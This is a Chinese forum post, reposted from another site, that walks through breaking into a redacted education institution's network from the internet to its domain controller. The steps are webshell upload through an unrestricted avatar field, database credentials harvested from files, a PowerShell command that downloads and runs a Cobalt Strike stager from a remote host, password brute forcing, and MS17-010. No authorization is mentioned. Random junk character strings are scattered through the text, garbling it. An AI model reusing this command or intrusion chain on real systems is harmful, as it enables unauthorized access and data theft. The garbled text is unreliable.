找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2124|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

+ T1 ~# S' Q o 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路! j1 M' |5 ?& E4 u

7 A9 g, [) c7 O6 q* X$ \# N

B/ f+ F# T' p; q; F  " Q5 N) ]" _8 d5 T& j

. Q" _' k; x' z( t" N

1 u B( s5 Q/ ^ 正文# Y' j* e- v [

5 ^' {# Q7 g! P% j6 Q. n% d9 R

/ ?0 F2 c2 h% T: U- ^   " L: P: @6 O* h2 x3 m u

" |* v G1 x* g% c2 z0 K

2 B. h" q$ q, f* F+ ?$ ~* k. Q; A- b 目标:www.xxxx.com(一家教育机构)
k4 k. r, U- V# A2 U
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ ?" y3 R9 |8 M: g+ F* V

( {/ e1 e8 w7 W3 T$ G

2 d9 ^) Z+ f5 ~- O$ E; U, W# t vshapes=2 S. V0 b, ?, D

" t3 i( M( _' d& I1 h

# {* v f% u) H( Z! K5 ] 进行了简单的信息搜集
l9 @+ t) F% K8 J! l+ P- m
& `7 R' Q/ I: R& i* ?
3 I7 R3 @7 y Y+ p) S

! L U- l- O! ?# |

) q0 A! g# u" X3 q7 f$ U 子域名搜集( g* }/ Q8 M) [5 N9 h

9 u5 }* f* N' ]" C3 P E

: u" H1 V! O& a$ h' R* s vshapes=# p$ u& C$ J! I( n% b9 B

_# ]7 `8 `- S

) |& y) B& D9 o- U* K% g: ~ fofa找资产
. N# Z; r: J0 W8 \0 K8 d+ b/ B
8 x8 ? i9 |$ l" N8 ^
4 x, a: u) X! p6 H6 t- m- |/ I K

7 f0 q0 p; d$ `4 r% |/ Z, }

8 r% ^/ Y7 k% M/ n vshapes= / [& _; G7 \# s0 v* ^, r$ e2 G

6 O6 Z1 O' V2 S& _

- ?( W* J! d$ _3 |) J; F# M 一共七个资产。去重之后只有两个。
5 J$ W, i/ O& U6 ]$ ~0 q5 b. U
) N! J% E1 ?6 _* R- [$ c
. m5 ~2 F- G5 r( N6 {8 }) ?9 E

+ P9 V# I' z( z

7 t: d" U9 J8 i/ j4 O4 O 目录探测 $ u& Q3 ?+ Y; v4 ]' V5 B! h d

) J. r) |8 f8 d8 F7 T2 _8 [

2 s7 G6 T0 D0 g4 `! E' ^! I7 `( q vshapes= U! w0 Y: H2 \9 E8 L6 j

- n" o# X, B# ^9 [/ o

9 U0 F; Q9 i, X% {+ g! Q3 p9 W8 \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 X/ H1 G$ f( H1 b
6 l# l( g: Q3 E6 ~& ]6 `& d, J
. [' W2 q `8 y7 H q9 \

0 c! X, w0 M, u+ F# _5 o( U" s6 p

0 s" a2 x) \5 A7 s% g 我又尝试了通过修改返回包来绕过登录界面 - g5 Q; |/ z$ ^" J6 Z2 G

; @: P6 S J6 T

& y" f% a8 \1 P' F vshapes= j# a5 \- S# I1 I4 F! r2 d

! w9 ?) c4 Z5 `

( \/ r: l! v2 r B2 H 还是不行,尝试注入无果 5 n# y) m y+ _5 q9 i# C

) ^) B$ u- g3 n: p: D2 W3 x8 H

7 s: R( @6 h Y9 r vshapes= / z% d5 j7 \) b; Q7 w

& y2 d& p% B- d* S. ?+ |) Q9 S

5 ^& V+ {% Y9 f: J 不过我目录探测出了一处Spring信息泄露
# @6 K- E/ C5 T. c! e& ?
0 \; }3 |0 E5 r) i
8 q% f/ \$ E8 I& r; o

5 Z( I- a2 c, I' g- C$ N

% Z) U) [( [7 _, m+ z" z vshapes=+ a/ Q& K2 `6 j0 ]' v, ?

0 T i( C: Y7 m' t( g6 V/ ~

3 C% g9 o4 R v& m! ^ @, T 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录+ o* i( f) }! J# V* n

' Y" Q- [* H K# ]; K- a

( A) h+ `* [, ^2 C$ R% d9 G; _ vshapes=' _, c8 G, s) [; T

d5 w' Q. L1 T2 l8 R# \/ P( Y

0 Y9 N/ ]4 d9 d 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。$ c0 O+ R+ Z1 n6 @* x3 {

, a" P4 M- ~! Z5 m+ Q% c. n2 j: c$ n3 j

2 @- O- r, @* _: w: }/ W vshapes=' c" [1 f0 k4 E2 G* n

, j# ?) I: g1 z4 D; R5 _

8 q) ~( a! o0 O" ~: Z 获取有些师傅到这一步就手机抓包电脑测了。- j4 t8 i' i j% E+ @+ J& W

" s5 o( |$ u- H# X8 k7 j

- U& a& A9 w4 x ~; N- U' G Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。) E# q( o$ ^2 \( q9 n8 T" ^

8 H# X1 W" ~' K

6 K8 |1 K. e4 L 其中在一个公众号发现了小程序,可以进行注册。 % j/ I: ^ }: r) d8 d

1 `6 V* T9 C. b; @+ G: u

3 ~6 k% K" r4 o2 _. M" l9 _+ U: q 看到了头像上传,尝试上传获取WebShell + O! @- w- |8 P5 |6 c/ C3 S6 O

+ A; K c x& {1 u/ `

8 Q' p0 T9 H* R vshapes= 4 T6 c' Q5 K; e: k. _

9 H4 Y6 s# L% L2 ~ Y/ i9 p0 U

5 u; d' Y E7 P k8 e 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 7 T8 T8 V! C3 g! e: m) i

. @" B$ p% w( D" [3 X9 Q6 l/ x! l

% U* l" C, K2 f- |* x) Z) u$ A vshapes= 5 Z6 }. y+ d8 F# o& r' {% T l0 o4 |2 U

3 F5 l u. V# x8 ~" u

* a( p5 `5 c M" E2 O* ] 然后上了大马2 z" A* j1 Z/ |6 e7 ~. P9 p# Y, ]1 ?1 f

$ ?; o! ]6 k* v5 b* f" W

( }' d8 [6 A8 v, t1 P. |- B vshapes= , t" {, E) ~6 [

3 A+ d; e& b7 ?1 j% P+ y

+ ^7 O" t! }; j" C vshapes= - P* d0 q3 Y; v& {2 ~6 D8 n

0 V+ _0 T. i# f+ C: n

+ g& v" R3 m" d* { 通过翻找文件发现数据库账号密码 : B) R4 w9 U7 O/ I9 v6 C' H

" n; l$ {! d7 K2 R

6 H7 C$ }5 \" ` A+ u, s1 d vshapes= - C/ [( r E9 @* }9 v# B8 B

3 Z. Y% Q5 b: L: ~# g% t

* i/ w8 e; R5 y9 N2 r --内网渗透! _4 u3 U w7 ^2 g- ^' ^( l2 Y# x

6 r5 i( u5 @$ }5 q

6 h/ X. ^5 }1 D0 S- R" S" ]' r 直接通过powershell执行 cs上线 0 c' g( B; V: s J E

1 ?% @! h- k$ {: V

+ x1 G$ n* N% k) f& q& Z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ }$ z6 w! X( x+ V5 ?" P' d3 ^3 z

9 A; l. B h; ~7 { o/ ]5 }

6 l! m& j n" X$ q7 ~! C3 ` vshapes=4 s; E0 ]1 L3 f1 w

+ o) q5 Z0 E0 `" F5 h

9 s/ b! h! J. }% A3 F 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破! n% h6 O* C5 L0 U

: O: m2 W0 j. D Q& O

6 _+ y/ u# z+ S. ?( {0 b1 k vshapes= $ t1 [- _2 k1 j4 b0 e/ v% N

( ]2 l# S! q0 O$ J% P: d m) w

. ?2 j+ I. g+ K# ^; r8 ` 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) H% [9 r% x! r
8 h' `6 N: {; P0 _" [
8 Q* w' ~/ y- {( ~/ m( ] f
+ u. j' c$ D6 m; k- G

' R' e; _8 w. Q2 y

+ I& `) E! l) l* {# R' H8 f vshapes= 7 m5 l1 \ U5 H; o* l+ i

2 v2 T( e1 S5 P' A

- Q4 x3 _9 L& D4 E9 J+ d 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
~- U% w8 B# x$ \! v! i
6 x1 v' c0 e$ Q( ~8 C2 \$ b) T
. M9 F, E( e9 U7 \6 a7 e

8 h" l3 \2 R- y

. }& {# P3 A( \2 m vshapes= / @7 V! P) |, U' ?6 I9 @) a

% e5 l2 f3 ?: q+ m' \+ T

2 g2 _% z4 f) j) n. f
" k) j6 P! `' t& _) `7 N
/ M% |8 O) G+ [; _
# U( G' t+ O. L4 T# L5 n1 p1 C

; _5 e5 u. S: J/ n- H

! B0 U" @% ~" ~  $ ?' o) x8 }7 W# H" K

. O7 s U8 N/ b( D+ A) b. K9 ?

+ Z3 D9 _% T" u" ]8 j9 m 小结8 l- z/ \7 T# v. t

. c0 P# l# w. q* X- N

, i$ R# m; B# ^/ A/ u. `: L$ }   $ k$ |* W" ^5 ?+ F) D

: a/ y3 d3 {1 Y R; k

' e7 i1 G$ i8 n' K: ^; o7 ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!4 ]4 c! J# @& k ?% H# G

) t7 o: u6 V& @6 ^! C

$ i$ m0 C- B- @6 C6 p n% f  ; E4 m2 J* Y" l# g

f. a) u: C# i+ ~0 Q' J. O4 ?
    & Q! i3 Z* t$ q
  • * s- v9 w0 J8 v. H( L) ]   ) g( |. W# t1 s6 D8 `9 U
  • . M. W0 {( f# |, U" P' c* C$ c
  • 5 v6 M4 {! d, u6 {* m  * I% G2 }7 _1 w0 s0 ]
  • l: [2 I# C* ]4 P$ Z9 k
y# d. z, ^+ X3 O% i% G

* ^ k: w; D! _# N# p 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 5 h7 a+ ?" A/ M. q; ]

0 @. C! T0 b6 X* N$ E' {4 w

1 i1 v4 ]2 p" T6 l2 \   ) u Q' ?& Y+ ?: m

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表